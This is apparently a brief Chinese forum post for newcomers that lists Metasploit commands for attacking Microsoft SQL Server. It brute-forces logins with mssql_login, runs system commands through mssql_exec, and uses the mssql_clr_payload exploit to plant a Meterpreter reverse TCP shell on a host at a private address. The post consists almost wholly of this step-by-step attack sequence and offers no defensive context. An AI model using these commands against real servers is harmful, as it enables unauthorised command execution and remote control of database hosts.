5
10
20
新手上路
msfconsole
search mssql_login
use 0 或 use auxiliary/scanner/mssql/mssql_login show options
search mssql_exec
use 0 或 use auxiliary/admin/mssql/mssql_exec show options
set rhosts 192.168.80.181 set password 1234567 set cmd cmd.exe /c "whoami"
search mssql_clr
use 0 或 use exploit/windows/mssql/mssql_clr_payload show options
set rhosts 192.168.10.181 set password 1234567 set payload windows/x64/meterpreter/reverse_tcp run
使用道具 举报
本版积分规则 发表回复 回帖后跳转到最后一页
Archiver手机版
Powered by Discuz! X3.4© 2001-2015 Comsenz Inc.